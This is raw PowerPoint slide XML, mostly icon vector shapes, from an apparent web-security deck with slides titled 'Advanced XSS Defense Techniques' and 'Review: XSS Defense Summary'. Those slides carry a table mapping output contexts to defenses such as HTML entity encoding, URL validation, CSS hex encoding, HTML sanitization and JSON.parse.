                <a:gd name="T47" fmla="*/ 12712 h 21180"/>
                <a:gd name="T48" fmla="*/ 4963 w 10781"/>
                <a:gd name="T49" fmla="*/ 10938 h 21180"/>
                <a:gd name="T50" fmla="*/ 9994 w 10781"/>
                <a:gd name="T51" fmla="*/ 7839 h 21180"/>
                <a:gd name="T52" fmla="*/ 2134 w 10781"/>
                <a:gd name="T53" fmla="*/ 7681 h 21180"/>
                <a:gd name="T54" fmla="*/ 9770 w 10781"/>
                <a:gd name="T55" fmla="*/ 4649 h 21180"/>
                <a:gd name="T56" fmla="*/ 8444 w 10781"/>
                <a:gd name="T57" fmla="*/ 2672 h 21180"/>
                <a:gd name="T58" fmla="*/ 360 w 10781"/>
                <a:gd name="T59" fmla="*/ 7300 h 21180"/>
                <a:gd name="T60" fmla="*/ 2134 w 10781"/>
                <a:gd name="T61" fmla="*/ 4357 h 21180"/>
                <a:gd name="T62" fmla="*/ 7546 w 10781"/>
                <a:gd name="T63" fmla="*/ 2291 h 21180"/>
                <a:gd name="T64" fmla="*/ 6221 w 10781"/>
                <a:gd name="T65" fmla="*/ 337 h 21180"/>
                <a:gd name="T66" fmla="*/ 360 w 10781"/>
                <a:gd name="T67" fmla="*/ 3976 h 2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81" h="21180">
                  <a:moveTo>
                    <a:pt x="7748" y="9164"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7748" y="9164"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7277" y="9410"/>
                    <a:pt x="6895" y="9680"/>
                    <a:pt x="6603" y="10017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6378" y="10264"/>
                    <a:pt x="6199" y="10534"/>
                    <a:pt x="6087" y="10781"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5907" y="11185"/>
                    <a:pt x="5839" y="11590"/>
                    <a:pt x="5817" y="11904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5795" y="12218"/>
                    <a:pt x="5795" y="12488"/>
                    <a:pt x="5795" y="12668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5772" y="12892"/>
                    <a:pt x="5839" y="13094"/>
                    <a:pt x="5951" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2538" y="13273"/>
                    <a:pt x="2538" y="13273"/>
                    <a:pt x="2538" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2022" y="13273"/>
                    <a:pt x="1617" y="13656"/>
                    <a:pt x="1617" y="14105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="15722"/>
                    <a:pt x="1617" y="15722"/>
                    <a:pt x="1617" y="15722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="16733"/>
                    <a:pt x="2022" y="17429"/>
                    <a:pt x="2538" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2538" y="17429"/>
                    <a:pt x="2651" y="17429"/>
                    <a:pt x="2785" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2897" y="17429"/>
                    <a:pt x="3010" y="17563"/>
                    <a:pt x="3010" y="17743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3010" y="18799"/>
                    <a:pt x="3010" y="18799"/>
                    <a:pt x="3010" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3032" y="18799"/>
                    <a:pt x="3032" y="18799"/>
                    <a:pt x="3032" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3010" y="18979"/>
                    <a:pt x="3055" y="19158"/>
                    <a:pt x="3100" y="19360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3234" y="19787"/>
                    <a:pt x="3234" y="19787"/>
                    <a:pt x="3234" y="19787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3481" y="20550"/>
                    <a:pt x="4222" y="21179"/>
                    <a:pt x="4851" y="21179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5615" y="21179"/>
                    <a:pt x="5615" y="21179"/>
                    <a:pt x="5615" y="21179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6244" y="21179"/>
                    <a:pt x="6985" y="20550"/>
                    <a:pt x="7209" y="19787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7344" y="19360"/>
                    <a:pt x="7344" y="19360"/>
                    <a:pt x="7344" y="19360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7412" y="19158"/>
                    <a:pt x="7434" y="18979"/>
                    <a:pt x="7434" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="18799"/>
                    <a:pt x="7456" y="18799"/>
                    <a:pt x="7456" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="17743"/>
                    <a:pt x="7456" y="17743"/>
                    <a:pt x="7456" y="17743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="17563"/>
                    <a:pt x="7546" y="17429"/>
                    <a:pt x="7680" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7928" y="17429"/>
                    <a:pt x="7928" y="17429"/>
                    <a:pt x="7928" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8444" y="17429"/>
                    <a:pt x="8849" y="16575"/>
                    <a:pt x="8849" y="15722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8849" y="14105"/>
                    <a:pt x="8849" y="14105"/>
                    <a:pt x="8849" y="14105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8849" y="13656"/>
                    <a:pt x="8444" y="13273"/>
                    <a:pt x="7928" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7726" y="13273"/>
                    <a:pt x="7726" y="13273"/>
                    <a:pt x="7726" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7816" y="13139"/>
                    <a:pt x="7883" y="12959"/>
                    <a:pt x="7883" y="12780"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7905" y="12510"/>
                    <a:pt x="7905" y="12308"/>
                    <a:pt x="7905" y="12129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7928" y="11993"/>
                    <a:pt x="7928" y="11904"/>
                    <a:pt x="7951" y="11814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7995" y="11679"/>
                    <a:pt x="8017" y="11590"/>
                    <a:pt x="8107" y="11477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8220" y="11365"/>
                    <a:pt x="8377" y="11207"/>
                    <a:pt x="8714" y="11050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9231" y="10781"/>
                    <a:pt x="9432" y="10151"/>
                    <a:pt x="9163" y="9635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8894" y="9119"/>
                    <a:pt x="8265" y="8894"/>
                    <a:pt x="7748" y="9164"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10421" y="6266"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10421" y="6266"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10061" y="5727"/>
                    <a:pt x="9253" y="5547"/>
                    <a:pt x="8669" y="5884"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1034" y="8917"/>
                    <a:pt x="1034" y="8917"/>
                    <a:pt x="1034" y="8917"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="9231"/>
                    <a:pt x="225" y="9949"/>
                    <a:pt x="607" y="10488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="854" y="10871"/>
                    <a:pt x="1303" y="11050"/>
                    <a:pt x="1752" y="11050"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1752" y="11050"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1932" y="11050"/>
                    <a:pt x="2134" y="11073"/>
                    <a:pt x="2291" y="11117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2426" y="11163"/>
                    <a:pt x="2538" y="11207"/>
                    <a:pt x="2628" y="11252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2763" y="11365"/>
                    <a:pt x="2875" y="11454"/>
                    <a:pt x="2987" y="11679"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3077" y="11881"/>
                    <a:pt x="3167" y="12195"/>
                    <a:pt x="3167" y="12712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5278" y="12712"/>
                    <a:pt x="5278" y="12712"/>
                    <a:pt x="5278" y="12712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5278" y="12039"/>
                    <a:pt x="5166" y="11454"/>
                    <a:pt x="4963" y="10938"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4829" y="10601"/>
                    <a:pt x="4627" y="10309"/>
                    <a:pt x="4424" y="10062"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9994" y="7839"/>
                    <a:pt x="9994" y="7839"/>
                    <a:pt x="9994" y="7839"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10600" y="7502"/>
                    <a:pt x="10780" y="6805"/>
                    <a:pt x="10421" y="6266"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134" y="7681"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2134" y="7681"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9770" y="4649"/>
                    <a:pt x="9770" y="4649"/>
                    <a:pt x="9770" y="4649"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10376" y="4313"/>
                    <a:pt x="10556" y="3616"/>
                    <a:pt x="10196" y="3077"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9837" y="2516"/>
                    <a:pt x="9029" y="2358"/>
                    <a:pt x="8444" y="2672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="5727"/>
                    <a:pt x="809" y="5727"/>
                    <a:pt x="809" y="5727"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="6042"/>
                    <a:pt x="0" y="6761"/>
                    <a:pt x="360" y="7300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="741" y="7839"/>
                    <a:pt x="1527" y="8018"/>
                    <a:pt x="2134" y="7681"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134" y="4357"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2134" y="4357"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7546" y="2291"/>
                    <a:pt x="7546" y="2291"/>
                    <a:pt x="7546" y="2291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8153" y="1977"/>
                    <a:pt x="8355" y="1258"/>
                    <a:pt x="7995" y="719"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7614" y="180"/>
                    <a:pt x="6827" y="0"/>
                    <a:pt x="6221" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="2403"/>
                    <a:pt x="809" y="2403"/>
                    <a:pt x="809" y="2403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="2740"/>
                    <a:pt x="0" y="3436"/>
                    <a:pt x="360" y="3976"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="741" y="4515"/>
                    <a:pt x="1527" y="4694"/>
                    <a:pt x="2134" y="4357"/>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787802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Advanced XSS Defense Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2111887092"/>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HTML Sanitization and XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1610660315"/>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307630"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Review: XSS Defense Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>75</a:t>
            </a:fld>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1109509589"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="348916" y="1294542"/>
          <a:ext cx="8446168" cy="4228207"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1199147">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1923271">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5323750">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3582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Data Type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Context</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cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Defense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Body/Attribute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HTML Entity Encode/HTML Attribute Encode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JavaScript Variable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JavaScript Hex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GET Parameter</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URL Encoding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Untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> URL</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URL Validation,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> avoid JavaScript: URLs, Attribute Encoding, Safe URL Verification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String</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CSS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baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>CSS Hex Encoding</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HTML</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Anywhere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mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>HTML Sanitization (Server and Client Side)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DOM</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Safe use of JS API's</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537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Untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> JavaScript</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Any</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Sandboxing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> and Deliver from Different Domain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Client Parse Time</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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>JSON.parse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> or json2.js</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r h="3224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Embedded</a:t>
                      </a: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mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>JSON</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Serialization</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marR="4572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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7870004" y="108616"/>
            <a:ext cx="1166117" cy="1185927"/>
            <a:chOff x="6835420" y="635329"/>
            <a:chExt cx="1465134" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Oval 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg2"/>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8" name="Freeform 1"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7320232" y="881197"/>
              <a:ext cx="495511" cy="973392"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7748 w 10781"/>
                <a:gd name="T1" fmla="*/ 9164 h 21180"/>
                <a:gd name="T2" fmla="*/ 6087 w 10781"/>
                <a:gd name="T3" fmla="*/ 10781 h 21180"/>
                <a:gd name="T4" fmla="*/ 5795 w 10781"/>
                <a:gd name="T5" fmla="*/ 12668 h 21180"/>
                <a:gd name="T6" fmla="*/ 2538 w 10781"/>
                <a:gd name="T7" fmla="*/ 13273 h 21180"/>
                <a:gd name="T8" fmla="*/ 1617 w 10781"/>
                <a:gd name="T9" fmla="*/ 15722 h 21180"/>
                <a:gd name="T10" fmla="*/ 2785 w 10781"/>
                <a:gd name="T11" fmla="*/ 17429 h 21180"/>
                <a:gd name="T12" fmla="*/ 3010 w 10781"/>
                <a:gd name="T13" fmla="*/ 18799 h 21180"/>
                <a:gd name="T14" fmla="*/ 3100 w 10781"/>
                <a:gd name="T15" fmla="*/ 19360 h 21180"/>
                <a:gd name="T16" fmla="*/ 4851 w 10781"/>
                <a:gd name="T17" fmla="*/ 21179 h 21180"/>
                <a:gd name="T18" fmla="*/ 7209 w 10781"/>
                <a:gd name="T19" fmla="*/ 19787 h 21180"/>
                <a:gd name="T20" fmla="*/ 7434 w 10781"/>
                <a:gd name="T21" fmla="*/ 18799 h 21180"/>
                <a:gd name="T22" fmla="*/ 7456 w 10781"/>
                <a:gd name="T23" fmla="*/ 17743 h 21180"/>
                <a:gd name="T24" fmla="*/ 7928 w 10781"/>
                <a:gd name="T25" fmla="*/ 17429 h 21180"/>
                <a:gd name="T26" fmla="*/ 8849 w 10781"/>
                <a:gd name="T27" fmla="*/ 14105 h 21180"/>
                <a:gd name="T28" fmla="*/ 7726 w 10781"/>
                <a:gd name="T29" fmla="*/ 13273 h 21180"/>
                <a:gd name="T30" fmla="*/ 7905 w 10781"/>
                <a:gd name="T31" fmla="*/ 12129 h 21180"/>
                <a:gd name="T32" fmla="*/ 8107 w 10781"/>
                <a:gd name="T33" fmla="*/ 11477 h 21180"/>
                <a:gd name="T34" fmla="*/ 9163 w 10781"/>
                <a:gd name="T35" fmla="*/ 9635 h 21180"/>
                <a:gd name="T36" fmla="*/ 10421 w 10781"/>
                <a:gd name="T37" fmla="*/ 6266 h 21180"/>
                <a:gd name="T38" fmla="*/ 8669 w 10781"/>
                <a:gd name="T39" fmla="*/ 5884 h 21180"/>
                <a:gd name="T40" fmla="*/ 607 w 10781"/>
                <a:gd name="T41" fmla="*/ 10488 h 21180"/>
                <a:gd name="T42" fmla="*/ 1752 w 10781"/>
                <a:gd name="T43" fmla="*/ 11050 h 21180"/>
                <a:gd name="T44" fmla="*/ 2628 w 10781"/>
                <a:gd name="T45" fmla="*/ 11252 h 21180"/>
                <a:gd name="T46" fmla="*/ 3167 w 10781"/>
                <a:gd name="T47" fmla="*/ 12712 h 21180"/>
                <a:gd name="T48" fmla="*/ 4963 w 10781"/>
                <a:gd name="T49" fmla="*/ 10938 h 21180"/>
                <a:gd name="T50" fmla="*/ 9994 w 10781"/>
                <a:gd name="T51" fmla="*/ 7839 h 21180"/>
                <a:gd name="T52" fmla="*/ 2134 w 10781"/>
                <a:gd name="T53" fmla="*/ 7681 h 21180"/>
                <a:gd name="T54" fmla="*/ 9770 w 10781"/>
                <a:gd name="T55" fmla="*/ 4649 h 21180"/>
                <a:gd name="T56" fmla="*/ 8444 w 10781"/>
                <a:gd name="T57" fmla="*/ 2672 h 21180"/>
                <a:gd name="T58" fmla="*/ 360 w 10781"/>
                <a:gd name="T59" fmla="*/ 7300 h 21180"/>
                <a:gd name="T60" fmla="*/ 2134 w 10781"/>
                <a:gd name="T61" fmla="*/ 4357 h 21180"/>
                <a:gd name="T62" fmla="*/ 7546 w 10781"/>
                <a:gd name="T63" fmla="*/ 2291 h 21180"/>
                <a:gd name="T64" fmla="*/ 6221 w 10781"/>
                <a:gd name="T65" fmla="*/ 337 h 21180"/>
                <a:gd name="T66" fmla="*/ 360 w 10781"/>
                <a:gd name="T67" fmla="*/ 3976 h 2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81" h="21180">
                  <a:moveTo>
                    <a:pt x="7748" y="9164"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7748" y="9164"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7277" y="9410"/>
                    <a:pt x="6895" y="9680"/>
                    <a:pt x="6603" y="10017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6378" y="10264"/>
                    <a:pt x="6199" y="10534"/>
                    <a:pt x="6087" y="10781"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5907" y="11185"/>
                    <a:pt x="5839" y="11590"/>
                    <a:pt x="5817" y="11904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5795" y="12218"/>
                    <a:pt x="5795" y="12488"/>
                    <a:pt x="5795" y="12668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5772" y="12892"/>
                    <a:pt x="5839" y="13094"/>
                    <a:pt x="5951" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2538" y="13273"/>
                    <a:pt x="2538" y="13273"/>
                    <a:pt x="2538" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2022" y="13273"/>
                    <a:pt x="1617" y="13656"/>
                    <a:pt x="1617" y="14105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="15722"/>
                    <a:pt x="1617" y="15722"/>
                    <a:pt x="1617" y="15722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="16733"/>
                    <a:pt x="2022" y="17429"/>
                    <a:pt x="2538" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2538" y="17429"/>
                    <a:pt x="2651" y="17429"/>
                    <a:pt x="2785" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2897" y="17429"/>
                    <a:pt x="3010" y="17563"/>
                    <a:pt x="3010" y="17743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3010" y="18799"/>
                    <a:pt x="3010" y="18799"/>
                    <a:pt x="3010" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3032" y="18799"/>
                    <a:pt x="3032" y="18799"/>
                    <a:pt x="3032" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3010" y="18979"/>
                    <a:pt x="3055" y="19158"/>
                    <a:pt x="3100" y="19360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3234" y="19787"/>
                    <a:pt x="3234" y="19787"/>
                    <a:pt x="3234" y="19787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3481" y="20550"/>
                    <a:pt x="4222" y="21179"/>
                    <a:pt x="4851" y="21179"/>
                  </a:cubicBezTo>
